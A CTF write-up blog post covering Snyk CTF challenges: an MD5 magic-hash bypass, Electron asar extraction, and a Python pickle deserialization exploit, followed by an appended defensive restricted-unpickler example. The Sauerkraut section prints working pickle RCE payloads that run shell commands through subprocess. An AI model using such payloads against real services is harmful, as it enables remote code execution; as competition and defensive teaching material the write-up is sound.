Hello everyone, I hope you are doing well. On 5th October, Snyk CTF ran from 9:00 am to 7:00 pm ET. I didn't really solve the majority of the challenges due to limited time, but I will share the ones I did. The whole CTF was fun, with a good variety of challenges, as it was a jeopardy-style CTF. For some of the challenges I wasn't able to make writeups, as the CTF had ended and the challenges weren't up after the competition. So here are the challenges that I managed to write up.
Magician (Web)
This web challenge had an input field asking us for a string whose MD5 hash would be equal to the given one, meaning a hash collision, where two different files or strings produce the same hash.
I tried entering some random text, and at the bottom it showed the MD5 hash of that string.
But we need to enter a string whose hash will be the same as this one: 0e365027561978452045683563242341
I tried to crack this MD5 hash using CrackStation and hashcat but failed, so I googled the hash.
So we just have to submit the string QNKCDZO and we will pass the condition.
Electronbuzz (Misc)
In this challenge we were given an Electron application in the form of Windows and Linux files, so I downloaded the Debian package and extracted it, which gave me an app.asar file. In Electron, this archive holds the source code and some configuration files of the main application.
We can extract it by running npx asar extract app.asar .
The asar tool itself can be installed with npm install -g asar
And we can get the flag by reading challenge.yml
Robert Louis Stevenson (Misc)
In this challenge we were given a tar file which, on extracting, gave us some folders that also included archive files.
I went into each directory and searched for a file that might contain something.
And the flag was in one of the folders.
Sauerkraut (Web)
This was a web challenge that had a text form where we could submit text.
On entering some text, it gave us an error about "invalid base64".
So after inputting base64-encoded text we got this:
It then said that it "could not find MARK". I didn't know what that meant, so I just encoded that text.
And when I submitted that, it showed me "pickle data was truncated".
Here I googled pickle and found that it's a Python module that serializes objects into a byte stream so that they can be stored or passed to a different process, and deserializes them back into objects.
This led me to exploiting pickle in Python. I found a resource showing RCE via pickle, so this is the PoC that I found:
import base64
import codecs
import pickle


class RCE(object):
    def __reduce__(self):
        import subprocess
        # Invoked by the unpickler on load: runs `id` and returns its output as bytes
        return (subprocess.check_output, (['id'],))


class RCEStr(object):
    def __reduce__(self):
        # Wraps the RCE gadget so its byte output is decoded to a str on load
        return (codecs.decode, (RCE(), 'utf-8'))


pickle_data = pickle.dumps({'name': RCEStr()})
payload = base64.urlsafe_b64encode(pickle_data)
print(payload.decode('utf-8'))
Perfect, we have found that we can do remote code execution. All that is left is to find the flag, so I ran the ls command to see if there's a file we can read.
import base64
import codecs
import pickle


class RCE(object):
    def __reduce__(self):
        import subprocess
        # Same gadget as before, now reading the flag file instead of running `id`
        return (subprocess.check_output, (['cat', 'flag'],))


class RCEStr(object):
    def __reduce__(self):
        return (codecs.decode, (RCE(), 'utf-8'))


pickle_data = pickle.dumps({'name': RCEStr()})
payload = base64.urlsafe_b64encode(pickle_data)
print(payload.decode('utf-8'))
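As an added defender-side example (not part of this writeup or the challenge), here is how a service that accepts base64-encoded pickles could refuse the PoC above: a static scan of the opcode stream plus an allow-listing find_class, so REDUCE never reaches subprocess.check_output or codecs.decode. SAFE_GLOBALS, the Gadget class and the sample payloads are assumptions made for the demo.

```python
import base64
import io
import pickle
import pickletools
import subprocess

# Allow-list of (module, name) pairs the loader may resolve; everything else,
# including subprocess.check_output and codecs.decode from the PoC, is refused.
SAFE_GLOBALS = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str")}


class RestrictedUnpickler(pickle.Unpickler):
    # find_class runs for every GLOBAL/STACK_GLOBAL opcode, before any REDUCE
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def referenced_globals(b64_payload):
    """Static scan (nothing is executed): the (module, name) pairs the pickle
    would import. STACK_GLOBAL takes its operands from the two preceding string
    pushes, which is the shape pickle.dumps emits for protocol 2 and above."""
    data = base64.urlsafe_b64decode(b64_payload)
    found, strings = [], []
    for opcode, arg, _ in pickletools.genops(data):
        if opcode.name.endswith(("UNICODE", "STRING")):
            strings.append(arg)
        elif opcode.name == "GLOBAL":          # protocol 0/1 form: "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif opcode.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
    return found


def safe_load(b64_payload):
    """The challenge's flow (base64 -> unpickle) with the gadget check added."""
    bad = [g for g in referenced_globals(b64_payload) if g not in SAFE_GLOBALS]
    if bad:
        raise pickle.UnpicklingError(f"rejected payload importing {bad}")
    data = base64.urlsafe_b64decode(b64_payload)
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Gadget:
    # Hypothetical: same shape as the RCE class in the PoC; never run by safe_load
    def __reduce__(self):
        return (subprocess.check_output, (["id"],))


# Constructed sample inputs: a harmless record and the gadget-carrying one
BENIGN = base64.urlsafe_b64encode(pickle.dumps({"name": "alice"})).decode()
HOSTILE = base64.urlsafe_b64encode(pickle.dumps({"name": Gadget()})).decode()
```

The scan is a cheap pre-filter for logging and alerting; the RestrictedUnpickler is the actual control, since it refuses the import at the opcode that would perform it.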